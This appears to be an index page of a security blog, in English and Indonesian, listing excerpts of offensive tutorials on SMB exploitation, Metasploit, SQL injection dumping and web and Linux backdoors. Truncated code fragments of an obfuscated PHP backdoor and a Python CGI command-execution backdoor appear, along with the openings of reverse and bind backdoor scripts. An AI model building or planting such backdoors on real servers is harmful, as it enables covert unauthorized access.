Tutorials SMB Exploit (MS17-010) dengan EternalBlue dan DoublePulsar EternalBlue dapat digunakan untuk melakukan eksploitasi pada layanan Server Message Block (SMB) tanpa membutuhkan proses otentikasi. Kemudian ditambah dengan menggunakan DoublePulsar untuk mengirim sekaligus mengeksekusi malicious Dynamic-Link Libraries (DLL) atau
Tutorials Directory Traversal with DotDotPwn (HTTPS Mode) This is my experience when I was dealing with some applications that have a Directory Traversal vulnerability. I was using DotDotPwn by nitr0us when finding a vulnerability on Quickshare File
Tutorials Non-alphanumeric PHP Simple Backdoor After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor. <? $_="{"; #XOR char $_=($_^"<").($_^">;").($_^"/"); #XOR = GET ?> <?=${'_'.
Exploit Development SEH Based Stack Overflow - The Basic Kali ini saya akan coba tehnik lain dari stack overflow, yaitu stack overflow berbasis SEH. Apa itu SEH? silakan dibaca diliteratur-literatur berikut: Structured Exception Handling Win32 Exception handling for assembler
Tutorials MSF Postgres Problem on BT5 If you read this post then I bet you have the same problem with me. When I tried to run the msfconsole on my BT5 I have this buggy information.
Tutorials Silent Backdoor with Weevely Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing
Tutorials Metasploit Meterpreter Command Shell Upgrade Seeing is believing 🙂 [email protected]:~# msfconsole =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 707 exploits - 359 auxiliary - 57 post + -- --=[ 225 payloads
Exploit Development Some Documents of File Specifications/Formats Here are some documents to help you understand some file formats/headers, for file format fuzzing purpose: WAVE PCM soundfile format (RIFF) https://ccrma.stanford.edu/courses/422/projects/WaveFormat/
Tutorials Backtrack 5: How to install VMware Workstation 7.1.3 So I want to install VMware Workstation 7.1.3 on Backtrack 5, but there were errors after I ran the binary (e.g: ./VMware-Workstation-Full-7.1.3-324285.x86_64.bundle)
Tutorials Dump Windows System Info When you were asked to collect all Windows system information such as list of users, services, software installed and its version, Windows update history etc, you probably want to see
Tutorials Create a WAR backdoor with Metasploit Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps: 1. Creating
Tutorials Remove Comments from Configuration If you want to configure something, sometimes it contains the comments from the developer which help us to figure out options of arguments that will be used. But if you
Tutorials ShodanHQ Queries For Penetration Tester Have you ever heard SHODAN Search Engine? SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described
Tutorials 0day Linux Escalation Privilege Exploit Collection I have created a script that contains of local privilege escalation exploits that was published on Exploit-DB.com between October – November 2010. Take a look at here 201011-0day-linux-exploit.tar.bz2 (md5sum: b890f6aeccf1721267166e221cd547df) *Update: I rename the file and make the script more comfort.
Tutorials CGI Backdoor for Linux with Python #!/usr/bin/env python # Info : Linux based CGI backdoor with python # author: otoy # date : 0x102010 import cgi,os,re,sys form = cgi.FieldStorage() cmd = form.getvalue('cmd', '') osexe = os.popen(cmd) dirt = os.getcwd()+'/' prognm = sys.argv[0].strip() progfl = re.
Web Security Web Links Gatherer (ver 2) By using Beautiful Soup, we can change the code as seen at the previous post to the code below… and it even works much better… just by changing the regex function, it return a better result : #!/usr/bin/python # otoy -- https:
Tutorials Web Links Gatherer dengan Python program sederhana ini digunakan untuk mengumpulkan link-link yang ada pada sebuah halaman web, bisa juga di kembangkan menjadi sebuah crawler.. 😀 #!/usr/bin/python #info: program untuk mendapatkan info link-link # yang terdapat dalam sebuah halaman web # # otoy(https://otoyrood.wordpress.com) # 0x102010 from urllib import
Tutorials Bermain String dengan Python #!/usr/bin/python import sys pgun='''penggunaan: %s <kalimat> contoh: python %s saya pusing'''%(sys.argv[0],sys.argv[0]) def main(): args = sys.argv[1:] if len(sys.argv) <= 1: print pgun sys.exit(1) #reverse kata (dalam bentuk list)
Tutorials Reverse Connection Backdoor for Linux #!/usr/bin/python #Info : This is a linux based reverse connection backdoor and # this is NOT an interactive Shell! #Author : otoy #Date : 0x102010 #Blog : otoyrood.wordpress.com import socket,sys,os,re #define osinf = os.uname() info='''==================================== py_backdoor ==================================== Author : otoy Date : 0x102010
Tutorials Bind Backdoor for Linux #!/usr/bin/python # Info: This is a linux based bind backdoor and # this is NOT an interactive Shell! # Author: otoy# Date: 0x102010 # Blog: otoyrood.wordpress.com import socket, sys, os, re def daemonize(): pid = os.fork() if (pid != 0): os._exit(0) def main(
Tutorials A polymorphic shellcode maker /* A polymorphic shellcode maker original prorgam created by Rizki Wicaksono(http://www.ilmuhacking.com) i add some functions to make it more interesting, i add "sub,add" functions beside the original xor into decoder otoy(http://otoyrood.wordpress.com) 0x82010 */ #include <sys/time.
Tutorials Mendapatkan Info User (sederhana) Menggunakan Regex Pada Python #!/usr/bin/python import os, re osenv = str(os.environ) usrpat = re.compile(' 'USER': '(.*?)'') homepat = re.compile(' 'HOME': '(.*?)'') usrp = usrpat.findall(osenv) hmrp = homepat.findall(osenv) print 'USERNAME :' + usrp[0] print 'HOME :' + hmrp[0] in action:
Tutorials Very Simple FTP Fuzzer Written in Python, i try to make a simple fuzzer for FTP server. This script will try to fuzz the commands like APPE, USER, LIST, CWD, etc..you can find all commands here 😉 This script is simply a modified version from muts simple ftp
Tutorials Reverse Engineering: Patch Program Sederhana Dengan melakukan reverse engineering dan menganalisa kode sebuah program (assembler), kita bisa melakukan patching terhadap sebuah program dengan merubah alur program tersebut sesuai dengan yang kita inginkan. Pada tulisan kali ini, saya akan coba sedikit menjelaskan bagaimana melakukan patching tersebut. Kita akan menggunakan program
Web Security How to: SQLMap (dump and destroy) SQLMap is the tool to automate SQL Injection vulnerability exploitation. This tool is very popular to exploit the SQL Injection vulnerability. While most of web hacker enthusiast knew about this tool to gather information and retrieves the tables information, i try to share this